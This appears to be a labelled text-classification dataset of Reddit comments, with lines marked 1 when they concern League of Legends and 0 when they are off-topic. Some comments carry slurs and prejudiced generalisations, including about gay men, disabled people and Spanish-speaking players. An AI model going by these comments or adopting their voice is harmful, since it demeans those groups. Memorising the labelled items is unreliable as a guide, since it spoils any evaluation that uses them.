1	We’ll start with our golden rule – you can use League of Legends IP as the basis for a fan project that you’re giving away for free or that’s only generating ad revenue (we’ll refer to this type of free fan project as a “Project”), as long as you comply with the guidelines outlined below for using our IP (the “Guidelines”). As a matter of fact, as long as you comply with our Guidelines, we think it’s great if you create awesome, free and original content for League of Legends fans.   If you ask players to pay you for something that’s based on our IP, however, you’ll first need our prior written consent. Submit a request for consent by contacting us at 3rdPartyRequests@riotgames.com so we can inspect your work and decide whether your Project’s gonna be allowed. To be clear: our default answer to these sorts of projects is to disallow them."
1	mid laners with double standards are the worst...   I'm playing mostly Zed mid lately (cuz he's broken as fuck at my elo, where enemy team just doesn't understand that GA/QSS completely counter him, at least the way I play him - 3 BT, BC, LW xP), and whenever they're up i hop over the wall at take my wraiths (yes, I consider them mine)... however, when I'm backing or dead or ganking, I also ping my jungler, my lane, and write "farm, freeze, shove, do whatever u want" (the first time, consequential ones I just ping)...   now I can understand top laners getting angry when jungler comes and taxes their carefully frozen lane, or bot laners worrying about overextending with no backup if jungler shoves and backs... but as a mid laner, I couldn't care less where my lane is, my tower their tower in the middle, who cares, I'll just shove it some more anyway and either harrass under tower or go gank top or bot...
0	yea this happened to my parents, my dad moved my older brother and his wife from the US to Italy. My grandparents from my mother side, who were always a wedge in their relationship, ended up coming to "visit" 3-5 months at a time, and they were literally on the phone with my mother for hours everyday. So now we're back in the US because their constant presence caused a series of events which eventually led to us getting legally kicked out of our house in Italy, and because my dad lost his job. They had promised us a House and a car. My grandpa crashed the car, and they gave the house to my moms brother. My mom still gives all of her attention to her father, and I have no idea how my dad has managed to put up with her bullshit for so long.
0	Absolutely true. However, rough generalizations of the top of class don't always filter down. I used to have a guy at work who would get a rise out of the other woman in the office with stuff like this. Tried it once with me by telling me that women would never be in the NHL except as tokens. I agreed but pointed out to him that it would not stop me from being able to kick his ass all over the ice in a game.
0	when u pirate music, u hurt the industry. people such as a non specific audio engineering student has to then go into a field that is making only a much smaller fraction of what it used to make and therefore can not make enough money to pay off his student loans for a very long time. a loss of a billion dollars doesn't really hurt the artist but it slowly takes more and more money from people within the industry who are already struggling in the slowly recovering economy.
1	it wasn't just chaox. many old players including doublelift talked about uzi, devil (namei), and other talented chinese players around the same time or even before as well. Back during season 2 when there were more international tournaments, tsm, clg etc did get to clash with chinese teams that held famous players like tabe, whitez. Why do you think CLG kept trying to go east to compete in ogn and the like while TSM stayed in NA way back?   I remember there used to be a vlog of doublelift talking about getting to watch Namei play and cs. If i remember correctly, he complimented Namei by saying how his play looked the cleanest out of any adc players he had the opportunity to watch and his play style looked almost effortless in lane etc etc. As for Chaox talking about uzi when no one did, i believe that was because he was an actual pro player and not a caster. Anyone who followed up on the chinese team knew uzi was amazing. Royal did beat OMG during season 3 finals after all. The casters, along with the majority of the world didnt really get a chance to talk much about uzi since the attention was elsewhere (partially due to montecristo joining the analyst desk and would only talk about korean teams =p). If we had a "montecristo like" person that followed the chinese league also come and join the analyst desk, they would have most definitely talked about uzi.   being honest, i think the research was underdone -_-.
0	Not necessarily. Not arguing the part about pulling out, but as far as the socks go, it can work to an extent. If you have something with you that you believe to be lucky then you can reduce the level of stress so it's easier to concentrate. Of course studying and actually knowing your shit means much, much more, but I think the comfort of the "lucky" item may be useful to some people.
0	The problem is, most of the time a prenatal test can't tell you exactly what problems the child will have as it grows up. Think about Downs Syndrome, for instance - some people with Downs Syndrome are completely healthy, grow up to live on their own with minimal support, get jobs, participate in their communities, date and get married, etc. Some children with Downs Syndrome have complicated medical problems that can even be lethal. Some have severe developmental disabilities and require day-to-day support throughout their lives. And there's no way to predict any of these outcomes, all there is to work with is the diagnosis of Downs Syndrome.   Then there's even murkier findings. Maybe on ultrasound your fetus has shortened long bones. Could be your kid will be a bit short. Could be he'll have a crippling or even lethal skeletal dysplasia. We can throw some statistics at you, but at what point do you give up on the chance that the baby will be healthy?   Anyway, any baby has a chance of ending up with a medical problem that can't be diagnosed prenatally (autism, epilepsy, childhood cancer, etc). Or despite your best parenting efforts, they might grow up to have schizophrenia and end up on the streets, or become druggies who can't keep a job, or get a traumatic brain injury and need 24/7 care. So new parents always need to weigh the risks of their child becoming a "burden" regardless of any prenatal testing.   Of course this doesn't even address that different people can define "burden" differently, too.
1	I personally feel movement should mostly be based on what a champions role is designed to be.   Take Braum for example he is a big guy which in real life would usually mean he is slower, plus he is carrying a huge shield, lets compare him to a worlds strongest man competitor - when they are running with a heavy item they don't go fast they can get at best a jogging speed, but he has a ms of 335.   Now we take Ezreal he is a small guy with not much to carry, his body build and characteristics as an explorer allow you to assume he should be able to run a hell of a lot faster than braum (yes with all the belts he would slow down but lets ignore that fact), now ezreal has a base ms of 325 which is 10 slower than braum's base ms.
0	I don't understand. Most computer programming languages that existed 20 years ago are completely invalid now. Considering Moore's law, the languages in use in the next 20 years will be completely different then the ones we use now.
1	Well, the last 2 games Aphro performed like utter shit and I say this as a fan. He fed first blood in the last game and threw laning phase in the game before and even a few games before that he made some really nasty mistakes. He doesn't get much criticism cause people like him too much (myself included).  He needs to get his shit together, so far he's only been good on Lulu.   Doublelift actually did show good resulsts, he managed to outcs a 3/0 Draven as Ezreal and kept up with him. Vs Qtpie, it was Ezreal vs Cait, qtpie started with red elixir + health pots and Double started with Dorans blade. He outcsed her, I don't even know how thats possible. I think people don't realize that the support + jungle + rest of the team is holding Doublelift back, I don't like when people imply Doublelift has got worse, he really didn't.   Chauster is a smart player but a horrible jungler, he alway said it's his least favorite role, so I don't know, he's performing really bad.   Link is great in lane, farms well, trades well but he doesn't roam at all and teamfights he's mediocre.   Hotshot has the same problems as always, he tunnels on Malphite + Cho  and gets SMASHED in lane because those heroes can't really pressure anything. He should try to play Jax, he used to carry an entire tournament with him... good old times. At least he's trying to change his pool by practising Renekton + Karthus.   They either have to get their shit together, or bring back Jiji mid, Link jungle and Chauster top. This would improve their top lane A FUCKING LOT and their mid too! And their jungle would be on equal level still.  Best choice imo.
0	I'm a (straight) bouncer at a gay bar. For me, being a "fag" is not just flamboyancy and fashion. I notice that a lot of people considered to be "fags" are also rude, elitist, and have generally bad attitudes.   PS:  Forgot to mention that they also have a habit of fucking in the bathroom.
1	You're massively underestimating the damage mitigation of orb of winter. Let's take a really bad scenario: Max range nidalee spear, with 600 AP, 6% penetration from masteries, void staff and 20 flat mpen (boots + runes). Let's also assume that we have no other MR items, we are not running MR runes and we play a champion without MR scaling. Close to the worst possible realistic scenario for Orb of Winter.   The base damage of that spear would be 1565, which should amount to 1628 damage with havoc and double-edged sword masteries if i'm not mistaken.   First, the mitigation by the shield itself. At level 18, the shield reduces damage by 210. The actual damage reduced is amplified with 39 MR ((70+30)*0.59 - 20). 39 MR amplifies the shield by 39%, meaning damage is reduced by 292.   The remaining 1336 damage still gets affected by the 70 MR on the item. The damage dealt will be multiplied 100/100+39, compared to a multiplier of 1 without the orb. This will leave 961 unmitigated damage. In the end, we'll have reduced the incoming damage by 1628-961=667 damage. This works out to around a 41% damage reduction. If the nidalee would have fewer items, less penetration or if we had other masteries, runes or MR items this percentage would be even higher.   Running the same calculation for a ziggs bomb, with the same items, works out to roughly a 66% damage reduction. Again, this is the worst case scenario.
1	support kayle works on lower elos. just Q E play agressive level 1 and zone them like hell. if they dont back off and try to farm under their turret they die to you/ad carry and you snowball. if they back off they lose farm and your carry snowballs. they dont know how to deal with that.   I did this numerous times and i had 2/3 games where I was so fed that my final build was shurelyas, black cleaver phantom dancer infinities edge berserkers greaves.
1	Plus, I read it all and was still pretty confused. Perhaps I'm retarded, but the
1	Old Graph but shows the makeup of the League Community by rank. The general trends hold true today](   Notice how the vast majority of the community is made up of Bronze and Silver Players. Aka the 44% LB Win Rates is a number  MOST  representative of  bronze and silver  level of play. So the question is: are LB players losing because the makeup of LB players are still learning mechanics? Or is it because LB is weak.   I think, the potential for LB is there. Her ability to deal high levels of burst while being able to escape pressure makes her a  great  assassin. However, I do not think she is the  best  assassin. But then again,  not every champ can be the best champ.   What would be more useful information to me is: Win Rate w/LB in Bronze, Silver, Gold, etc. shown individually.
1	having a fresh level 30 with scaling mana seals because they were tired of running out of mana on ezreal and were told that manamune was shit is unfun for everybody. Crit damage  maybe  benefits 2 champions more than ad runes. I understand that the game needs an IP  sink , but putting nigh troll runes in the game for the sake of "customization" when that customization is suboptimal is an unecessary trap. The whole rune system needs to be run through with a fine tooth comb. They need to round the numbers to make them cleaner and better to understand. They should add a new mark, seal, and glyph slot and make them available at level 1 along with your first quintessence slot and  give  champions a T1 rune for each type to introduce the rune system to new players.   With 10 of each type they could give us runes that aren't 1.67 but 1.5 and round everything to make runes easier to understand and lessen the burden of math on new players. Round cdr runes to .5% per for glyphs and allow us to rune 5% cdr without having ridiculous rune setups. Set AD mark at 1.5 so champions can see rune pages with a clean 15 that isn't rounded. Remove "secondary" runes or modify them so that they aren't complete shit 99% of the time and necessary for 2 champions 1% of the time. If they're going to radically change items for s3 and the cost value of stats they should change the rune system to be more friendly to new players too.   I don't mind that runes are an IP sink. I understand that their main purpose is to increase Riot's income with a secondary purpose of giving players some interesting customization at the beginning of the match (along with masteries). The only thing I  don't  understand is why they decided to put strange rounded values as a standard.
0	This is the only area where China would still benefit. They have the largest supply of rare earth minerals which are required for making advanced technological devices like the iPhone.   In the event of a fall in the Chinese economy that would be the only thing that keeps them afloat.   But let's be honest, the US owes China a lot of money. China would not jeopardize the money that is owed to them and their economy in a war with the US. This is not the '50s and they are not being run by a highly idealized communist regime. Nor do they have a military power allied with them that can match the US and EU/NATO like they did back in the '50s when the USSR was a major power.   China has North Korea and Pakistan, maybe. If Pakistan enters the war though that will be localized with Pakistan and India fighting each other for the most part. China also has a global economy dependent on many nations that would ally with the US or would be blocked from trading with by the US Navy. In short, getting into a fight with the US would only be long term detrimental to China and they are smart enough to know the consequences.   If North Korea decided to outright attack the US, which is the ONLY way we'd get into a war with them and we all know it so stop acting like we're just going to smack them around for no reason. China would either remain neutral or at most allow refugees to seek safety fromt he war. They would NOT go to North Korea's aid. For one it would work in their favor to have North Korea gone. A united Korea would end up having stronger ties to other Asian countries than to the US. South Korea has such a strong tie BECAUSE OF North Korea being a constant threat.   Remove that threat and the united Korea would be able to no longer rely on the US as a major defense and trade partner. They would be able to trade much more openly with China, who would take an interest in helping to rebuild the infrastructure of the north and get it up to speed with South Korea, and would probably focus more on trade with other Asian nations since the constant US supply would be less frequent with a smaller US military force present. Fewer US personel equates to less of a US based market.
1	I don't understand the point of this. You basically just said that you will queue with the same people that you're queuing with now. Which is common sense. Your conclusion/
1	PENTASSIST!"   As a support "main" (as much as one can really be an anything main at low elo) I think it's one of those ideas involving computers that sounds really nice in theory, but in practice wouldn't really work. And not only because of the extra programming involved, but also because of how many aspects there are to supporting.   For instance, if I'm playing Soraka and use Wish at my fountain, saving my ADCs life at the enemy nexus turrets and allowing him to get a kill and escape with 10hp, should that count as an assist?   If I'm Leona and already have three assists since I last died, should my assist spree end just because I'm the one who engaged and took the reactionary damage? I died, but because I took all those spells to the face, my team was able to mop up the enemy really fast.
1	Lol RIP East coast NA. They don't care about us for shit. Still getting same ping as people in Japan playing on NA servers. I cant imagine how many times in the past week I've said, "if i had half the ping I did right now, my summoners or this spell would have gone off". Like its beyond fucking annoying that I lose a lot of mid match ups with high mechanics because I'm limited by my ping. Also East Coast... what else have they given to us... Oh yah a LAN sever in Florida! What the actual fuck. I want to play on NA idc if its less ping thats ridiculous. What else? Pretty sure the only hint of competitive scene we've seen was a very small event in like New York in Season 2 when Azubu Blaze I believe came over here and destroyed everyone no challenge. Maybe I can fly to LCS some time to watch 1 match? Fuck That. I'm in college with minimal money and I'll probably never be able to see a competitive league game unless I win the lottery or some type of event was to happen on our coast. I live in Florida, specifically in Miami right where the damn LAN server is and playing on it its amazing but its also frustrating that I can't understand a single god damn thing Pablo or Julio are saying and I cant play with my friends on it because no one wants to grind to level 30 again and have to listen to a bunch of Enrique's in ranked. Btw LAN's biggest issue, no one gives a flying shit about it. People afk left and right not caring about it at all.
0	The real people to blame are the publishers who sell the books to the Bookstores.   Or maybe blame the whole "more-is-better-culture" in American  university literature?   I study physics in Sweden and I always sigh when an American book appears on the reading list. Without exception these book are much, much longer than books written by Swedish professors and seldom contain more useful info.
0	Similar situation here.   Had a coworker that was always on time, called out rarely(she came into work when she was having a heart attack) and one day, no call no show.   Everyone was worried, having no luck getting her by phone, so I went to her place on my lunch and knocked. No answer, but I saw her car there and something didn't feel right. I got the apartment management involved and told them everything, that she never called out, never was late and was not answering calls. They knocked, still got nothing and we then got the Police involved for a wellness check(only legal way to enter her apartment).   We find out that she had passed in her sleep.   Sad, but the good news of it was that she was living with her daughter and her daughter was going to be out of the country for the next week. I can't imagine the trauma of that situation.
0	And that's when you say: "you're a lot bigger than my ex too but hey i'm not complaining"
1	When I started playing LoL I got the game in spanish and instead of ''G'' of gold it was ''O'' of oro.
1	This is just bullshit. Yes it is bad if one company has the whole market under control for a certain product because they can lower quality and ask for more money because no one else can offer the product.   Streaming is a completely different thing. There is a ton of potential money in the market and as soon as twitch start to get shitty a bunch of new services will come out of nowhere and take over. You don't need much to start a site like twitch (compared to producing cars for example) and there's an insane amount of investors that would throw money at a new service if the community is unsatisfied with twitch.   The twitch guys know that too, the crowd that uses their service is not stupid and they know they have choices. They won't just suddenly stop all the good stuff their doing and start being evil because they can.
1	I, personally, try to simply cut out everything negativce I have to say to my teammates (soloq) and say it out. Everything positive, like scoring firstblood, securing a dragon via smitesteal etc. comes to the chat to keep up morale.   Besides that I try to completely ignore the chat if its not necessary for the game like strategy or smalltalk before the minions spawn.
0	There's a huge difference between being nice and being kind. I've met tons of "nice" guys, self-proclaimed and otherwise, that are not the kind of guy I would ever date. It's entirely possible to be TOO nice. A lot of very nice people are way too easy to take advantage of, even if it's not done intentionally. In a relationship a nice guy will often care so much about his partner that he'll do anything for that person and go along with whatever they want to do or say, even if it's not what he personally wants. This isn't what makes a healthy relationship. If I ask what you want to do today, and all you say is "whatever you want to do is fine" I'm going to get sick of you really fast. In a relationship both people have to make those decisions. The  stereotypical  nice guy often comes across as a pushover who's afraid of confrontation (I'm aware that this is a very generalized statement, but so is the idea that women always treat nice guys like shit).   On the other hand, someone can be unbelievably kind and not be too nice. For example, the guy that I'm dating right now is a bit of a dick (and I say that in the most loving possible way as I, too, am a bit of a dick). He makes fun of me, is really outspoken about his opinions on the things that I like that he doesn't. But, he's also one of the kindest, most compassionate people I've ever met. He treats me and other people with respect, he apologizes if he does something wrong, he's polite, selfless and very sweet. He just doesn't put up with the sort of thing that a lot of "nice guys" do. If he doesn't want to do something, he says it. And that's what women, and people in general, typically want from a significant other. He makes fun of me and some of the things I like, but I also make fun of him and some of the things he likes. We do the things together that we both like.   I've dated nice guys that would always do whatever I wanted to do only to learn six months later when we broke up that they actually hated doing X, Y and Z with me and only did it because they thought it would make me happy. It may sound weird, but this makes me feel a bit like a bully and I'm taking advantage of someone. If you don't like something that I do, tell me. I'm a big kid, I can do things on my own, just like you should be a big kid and able to do things on your own.   Sorry for the long rant, the "nice guy" conundrum always bothers me a bit.
0	People who lament about not getting sex even though they are "open" and "honest" and proclaim that they are a "nice guy" sound like massive liars.  I  bet people like OP think that all guys are either douchebags (guys with girlfriends) or nice (guys like OP).  The world is more complicated than that.   A guy who says "YOLO" unironically may go visit his sick grandmother every day.  A guy who is awkward at parties and doesn't talk to many people may violently take his frustrations out on his family.   Sorry for rambling.
0	I currently work here, as I have for almost two years now with 75% being service, I'm trained in all areas(baby, electronics, service and even BOH) and I will say almost all our calls other than "do you have this" or what time we open is filled with calls complaining about either the online site or another store. If it's a good call, take the survey at the top of the receipt, and call corporate if trilled with the service. If you need to complain call the store first, I promise we'll try to make it right(at least at our store here in VT), and if we can't and you're still angry, go ahead call corporate. I know I and all my managers will try to make a problem right. People also have to realise we have nothing to do with the online store(call 1.800.TOY.SRUS
1	I agree with this. You don't need damage output to be a good tank. Rather, you just need to be able to mess the other team up -- perhaps with high damage output, but more likely with sustained annoying AoE damage (Amumu's tears, sunfire, etc.), CCing the enemy squishy taking them out of the fight, or just CCing channeled spells and generally being disruptive.   I once managed to draw 2 ignites on a team as Leona, simply because I got my two stuns off at the beginning and drew so much aggro. Did not do that much damage, and I died, but that's two ignites that a) didn't fully stack and were wasted and b)couldn't later finish off my kill streak carry. We also went 4 for 1 in that fight.
0	Erm, I'm all for animal safety and the comeuppance for those who abuse them, but I don't really think that creating a meme from it encourages animal cruelty in any way whatsoever. Hitler memes don't encourage genocide (well, okay maybe comically). And certainly I don't think it does anything to portray the idiot who nailed the frog in the first place (giggity. ribbity?) in some angelic fashion.
0	Learning disability was once called 'mental retardation' because of the idea that they are mentally slower. However, 'retarded' or 'retard' then became an insult, meant to offend people by comparing them to a disabled person. Unsurpisingly, disabled people don't really like it when you use a comparison to them as an insult. As a result, the official terminology for the condition changed, because stopping the stigma of disability, and therefore the offensive slang, is much harder.
0	None of this does anything to argue my point.   If a person cannot speak in a manner that can be readily understood, then the position is not for them.   I am pleased that you have an ear for accents. I do not. I have taken several classes with professors who have thick accents, and my grade suffered for it.   I went to tutoring to pick up the rest and had to struggle hard to keep my grades at/above B level.   I'll say it again;  If I am incapable of effectively and easily communicating with a student who is paying money to be involved in my class, then I should not be teaching the class.   They have decided to take up a job that involves public speaking and smooth communication of lessons. It is their responsibility to do what they can to speak clearly.   Many people do not have the ear to pick apart accents and understand them - furthermore, why am I paying money to miss half the lesson because I can't understand this person?   I understand that some of the burden of understanding must fall to the student, but that's what study is.   You also speak to having spent five years as a student. Many folks do not attend college that long. Many go to two year colleges and just take an office job or something.   Your experiences are your own, and are not definitive proof of everyone's experience.
0	To all the naysayers: it is possible although I agree with you it is not likely.   When I was born (1997) my mother was at the ripe age of 47. The doctors were very worried that I would be a girl with down syndrome. They decided not to terminate the pregnancy because they wanted a girl and they have always been pro-life. They had already raised 3 boys (all of them with their own problems) but they loved their child even though it wasn't born yet.   As the due date rolled around, the doctors prepared dor the worst. But out came me, a 10 pound boy. This shocked the doctors. As I grew up my parents gave me lots of puzzles and one day at daycare my parents were told that I was better than all the other kids at solving them. They thought little of it; they were just thankful I wasn't disabled.   Fast forward to the first day of school. I am assigned to Ms. Z's kidnergarten class. Within a week, Ms. Z was tired of me disrupting class because I finished work before everyone (I know I know, it was vigorous work I excelled in). Anyway, the teacher advised that I move to the first grade immediately. So I was assimilated into the firsy grade rather easily and continued working diligently.   This year I am a senior with a 4.8 GPA. I am planning to attend USC for mechanical engineering because I really love math and physics. I know it's not really difficult to excel in the States' broken education system, but I really have a passion for learning  and I am very excited to go to college. And the doctor thought I would be handicapped! I know we all make mistakes, and I don't blame the doctor for advising an abortion. One day though, I think I'll write him a letter.
0	On my way to work today, major traffic, what would normally take me 10 minutes to get to work, took about half an hour (wasn't late though, hooray for leaving early) There was a guy who cut in front of someone who had quite a bit of space in front of him, but what the guy who cut in didn't know was the front cars brake lights were out, causing all 3 cars crash. Which just sucks for the other two, but the guy got what he deserved I'd say, as he had the most damage.
1	Fast question about Takedown, how can i estimate the damage i'll do my target ? I always feel like it's overkill when i use it... (Like i wait till my target has 300Hp (like 1/5th of their health) to use it because it' said i'll do 250~ so with armor reduction ... And in the end i end up doing 400hp damage or so, i went into messy situation because of this...
0	One hot summer morning, I had an epic drunk dump that was so unbelievably loud and long, that about half a minute into this barrage of machine-gun shitting, I just start giggling like a school girl at my own foul acquittal. This dialogue between my gleeful guffaws and the sploshing hail of poop went on for what seemed like an eternity, sometimes the spasms of my abdomen contorting both chortling orifices into similar sounding outbursts. After the deed was done, I washed up and went to bother my brother only to find him and a girl sitting in his bed with ashen faces pretending to watch a movie. He apparently tried to initiate some morning sex but was unfortunate to have had his window open (remember, hot Summer morning). My bowel movement concerto and subsequent self-indulgent laughing could be quite clearly heard from the bathroom window next door. My brother had turned on the television to mask the noise only to have an aftershock of putrid aroma slink into his room like a SEAL team. He buttoned down the hatches but apparently my stank settled to the ground like a thick fog.
1	This. I really improved on my artwork by attempting to draw real people and things. Especially useful for drawing people is a book on anatomy. When you understand how the bones connect to joints, and how muscles wrap around bones, you are better equipped to illustrate the body in motion.   This is a good start. I don't know how long you've been drawing, but you have the basic shape and contours of the body already. What's left is refinement:     Proportions: The body is fairly mathematical. The arm is approximately as long as the head is tall; hands are about the same size as the face, etc. For this picture, you have good proportion on the upper arm, but her forearms are too short. Try drawing this again, using the head (which is stylized nicely) as a ruler for body proportions.     Perspective: You did pretty good here, showing the different apparent heights of Nidalee's knees as she is stepping over the branch. Remember that things seem to get shorter and bigger as they get closer, and shorter and smaller as they get farther away. Again, using real pictures as a basis for your image will give you a feel for that.     Shading: You've got a good start with shading. When you're sketching the image, lightly show where the light is coming from and use that to help define the shapes in the picture through shading. For example, a sphere with a light bulb shining directly above it will have little shading above its equator, which will get gradually darker.     Textures: Something I personally enjoy doing, texture takes a lot to master. Again, use existing images to see what different textures look like in different scenarios.
0	Everyone wants the other side of the fence.   Every unattached person will tell you how lonely it is being single and how they'd gladly give up freedom for companionship.   Every married or long-term-relationship person will tell you they miss the freedom and solitude.
0	No, it's white-knighting if you defend said person unconditionally.  There's a de facto implication here that the girl is innocent and her father is a monster, e.g. the facts of why this slap occurred aren't even relevant because she has a vagina.   As someone who is routinely in the presence of a daughter who says things for which she deserves to be slapped by her father, I don't leap to conclusions like the rest of reddit.
1	I honestly think that it's a lack of supporting infrastructure in NA. If I were to drop out or delay college in order to pursue a pro League career I'd be setting myself up for a miserable life. Pro players don't get paid enough to compensate for the loss of education that is 100% mandatory to get a real job in NA, and the insane costs of college here just accelerate the issue. The only feasible way for an American player to afford becoming a pro is if their parents support them financially until they make it big and can pay for themselves, but if I told my parents that I'm going to spend all of my time playing videos so I can become a Pro Gamer that would think I'm insane.   NA teens and young adults have 2 options, get a minimum wage job and struggle to live or go to college and incur 20-40 thousand dollars of debt and then struggle to live and pay student loans.
0	So, for instance, if you quote directly from a reliable source about something in an active project, whoever has watchlisted it flashes the batsignal, calling other project members and tame admins, the properly cited direct quote from a reliable source will win over territorial meatpuppeting backed by admins in that project?  It won't then get taken to the dispute resolution noticeboard to be ignored for a few days before someone from the same project that was participating in the dispute purges the dispute from the dispute resolution noticeboard?  And when you bring all this up to admins the admins won't automatically assume that you're in the wrong, and, will confront you with actionable behavioral infractions and when you show them that what you were doing was saying "same to you" to the project members, what elicited a "you broke all these rules" to me, when admins find out that the instigator is in the "in crowd" suddenly breaking the rules gets a pass from the admins?
0	Normally I'm a very patient customer, and generally a good tipper (25-30% if service is excellent, 15-20% if good/average, 10% below average, anything below I deem the whole restaurant responsible and do not visit again, pay the bill 10% tip)   One time I was with a group of friends (13 of us).  First they split us up into two tables.  Our food took over two hours to come out, as we watched other people get served (definitely not a terribly busy day, seemed very average).  This is not the fault of the servers, but they lied to us frequently about when it would be coming out.  They then brought us our food 5 minutes apart for each group of 4 people.  Our drinks took 20 minutes after we ordered them.  It was faster for us to go to the bar ourselves (which was not busy at all).  Water sat empty for 15 minutes at a time.  After splitting us up into two groups they then put on Gratuity for parties of more than 8.  We refused to pay the gratuity and certainly didn't leave a tip of our own, and paid as much of the bill in small change as possible. The bill was about $270.
1	That mf and heal getting nerfed part, god that was amazing. Really good job man! I love your
1	I'm eating my words, hard.  I said Dyrus is a middle to lower-middle Top Laner in NA this split...   If my memory serves me, my Top Lane Rankings (Pre-Summer S4):     Ackerman (Godlike)     Balls     ZionSpartan     Quas     Dyrus     Seraph       7-8.  Who even goes here? (Yeah, not a fan of Innox or Westrice).   I'll eat my words.  They taste sour but Dyrus has proven himself time and time again.
0	Is height really something you can regret? To me that implies that you had some kind of choice in the matter. And now I'm imagining a Rumpelstiltskin-esque elf confronted you as a child and made you choose whether you would live to be 6'7" or 5'9". Naturally your young, naive self chose the former, but at what cost? AT WHAT COST?!
1	I would say something like a Forum to discuss theories. That would be nice. (Of coursome a search button)...Hm maybe also a short
1	Future Changes to Poppy feat. Morello   What are your plans for Poppy?   > Morello: Well, there are two choices; I’m OK with both to some extent;   > * Rework Poppy and make her a real pick in League, balance appropriately.   > * Don’t rework Poppy, and never ever buff her, and nerf her if she ever sees play.   Can you explain the reasoning behind your second choice?   > Morello: Because if Poppy’s good, she supports terrible counterplay and unreadable skills with a slew of mechanical overload. Current Poppy being strong damages the game more than Poppy players get to derive joy from playing Poppy in competitive settings.   Will you keep Heroic Charge?   > Morello: Football charge is the one skill on Poppy I really like and think can work.   Akali's Glow Effect Returns!   > Recently Akali lost the glow on her hands she got from her passive. Originally she was required to get a certain amounts of AD and AP before getting access to Twin Disciplines. With the removal of this requirement, the art team saw the effect was unnecessary, but, as QA Analyst ricklessabandon explains, that part of Akali is going back on:   > ricklessabandon: I followed up on this, and the removal was intentional (for reasons similar to what you mentioned). After speaking with some of the artists and the developer that made the change, we’ve decided to add them back—I’ll have the change up on the PBE with one of the next couple updates—basically our sentiments are that while the style is likely not something we’d make today, and we’d like them to have more gameplay significance.   > Those are opportunities that would best be tackled in a visual update for Akali. In the meantime, we’ve decided that since Akali has had those particles for nearly 3 years, it’s fine for her to hang onto them for a bit longer until the relaunch team turns their eye onto her (which could be a long time out).   >
0	No Fun League.   Oh snap, son, that is one sick burn on those sports-executive bigwigs!   Also thank you for humouring me and offering an informative but concise explanation of the uniform situation. From my high school sporting days (field hockey, because I went to an all-girls British public school and was too fuckin' hardcore to trifle with netball, which is basketball with 85% of the fun removed, for those who don't know) I get that ensuring a consistent uniform across players is pretty important, from the superifical "we look united against our opponents!" to the somewhat psychological of all being dressed the same, looking the same, working the same and in it together.   ...holy mother of run-on sentences, Batman!   To get vaguely back on topic, mental health is something that is particularly close to my heart, and that can occasionally (thankfully not too frequently) press my indignance button before I've had a chance to sit back and look at the broader context of something. We could discuss the ethics of corporate sponsorship of sports and sporting uniforms 'til the cows come home, but it's not going to change the bottom line and, really, why should it? The system seems to work for those involved, and more power to 'em, the fact that elite athletes will open support charities, particularly ones for less glamorous or more taboo subjects like mental health is a pretty fuckin' big deal in itself.   It would be bloody brilliant if the FREEDOM FOOTBALL powers-that-be take Marshall's stance into consideration in future and maybe incorporate public support for mental health charities in future games. Even if it's just one or two games a season, it's a relatively minor adjustment for them that could make a significant impact in public perception/understanding of mental illness. Lord knows it's something clouded by a world of prejudice and stigma.   ...but there I go grinding my mental health axe again
1	All of Nidalee's cougar abilities gain damaged based on her ultimates level so unless you ONLY want to use the ult to escape you should probably still level it up so you can deal damage with her cougar abilities.
0	Hahaha.   I just like things where I think they should go...   so umbrellas go in the coat closet by the front door (or whatever door gets used most.) Not in the bathtub, kitchen sink, or on the couch. If there's no coat closet, then there has to be some sort of basket or something and coat hooks. Coats also go in that closet. They don't go on the floor, or couch, though that doesn't make me freak out. I just put them away. Bitching at me for putting them away might get you a really snarky response, though.   Glasses and plates should either go above the dishwasher or next to the sink if there's no dishwasher, OR next to the table. I can deal with the latter, if there's a proper cabinet or hutch. And glass measuring cups aren't glasses. They don't go in the cabinet with the dishware. :P Likewise, measuring spoons don't go in with the soup spoons. Steak knives don't go in with the butter knives. Again, I'm more likely to just move them than make some scene about it - but if you put something away where it doesn't go, and I can't find it, don't make fun of me for it being right in front of me. I really won't see it if it's somewhere that doesn't make sense to me.   The underside of the bathroom sink shouldn't look like a hurricane hit. It also shouldn't be used to store things like dirty dishes. Ever. If the doors can't shut, you're doing it wrong. The same can be said for under your bed, though I won't bitch about you putting stuff under there as long as it's not something of mine or something bringing bugs in.   If you have long hair, don't clean your brush then drop the clump of hair on the floor. It's not that hard to throw things away. I WILL freak out about that one, Just like I'll be really unhappy if you put your cigarettes out via throwing them on the porch in front of the door. I smoked. I used an ashtray. That's where butts are supposed to go.   Don't ever.. ever ever ever.. move anything in my room. The clutter on my desk may look like a mess to you, but I know where everything is on it, and it's "organized" based on project I'm working on. You have no reason to go in my room anyway, as anything I'm willing to share is in the common area. Just.. don't even open the door to my room if I'm not home, unless it's on fire. And, if your cat pisses on my bed, I know you opened the door. Don't shut it and try to pretend you don't know what happened. You just did something gross AND invaded my territory - because your pets invading my room count as you invading my room. The moment I have to get a key lock to keep you out, we're not going to be good room mates. (If you are a room mate who also happens to be a long standing friend, or you have gotten permission from me, that's different.)   You're welcome to use my pots and pans if you don't have any. Don't burn stuff in them. Don't burn them. If you ruin my stuff, well, you know, accidents happen. Replace it. And don't replace a $50 skillet with a $5 Walmart one. That doesn't equal out. If it happens more than once, you won't be welcome to use my pots and pans, because I will be keeping them in the closet in my room. (See the note about having to lock my door.) Similarly, if I have 24 glasses when we move in together, and 3 months later only have 3, and I didn't break/lose any, I do expect you to replace them - with something at least similar. Plates, bowls, everything.   If you borrow my car and return it with no gas, you will never borrow my car again. If you tear a door handle off then tell me it's because my car is a piece of shit, you might just get run over by said car.   All these things have happened. This is why I don't like room mates of any gender at this point. I've had a few very awesome ones, but in general, no.   I know I'm not easy to live with, either. I don't generally get subtle hints. If you want to have a girl over and have me gone, you have to TELL me you want me gone. If you just say "Hey, my girl's coming to spend the night." I'm likely to respond with "Okay, I'll make sure there's enough dinner for one more person." or "Awesome. I should invite people, too!" I'm a total moron about things like that sometimes. I DO actually yell about hair clumps being thrown on the floor. I've even thrown a hairbrush or two over it. I did once pick up all of one guy's cigarette butts he chain smoked and put out on the porch and put them in his bed under the covers. I did, also, threaten to take a girl's face off with a brick wall if she even looked at me again in the next 20 days she had before we kicked her out. I'm still known for chucking tupperware across the kitchen at high velocity when my son and husband just stuff it in the lazy susan and it all gets jammed in there. While yelling. I put it all away afterward, but the tantrum isn't exactly appropriate. :P Happens about once a year about something like that.   Oh.. and one last thing: showers need to happen more than once every 2 months. I just don't care what your excuse is. Shower.
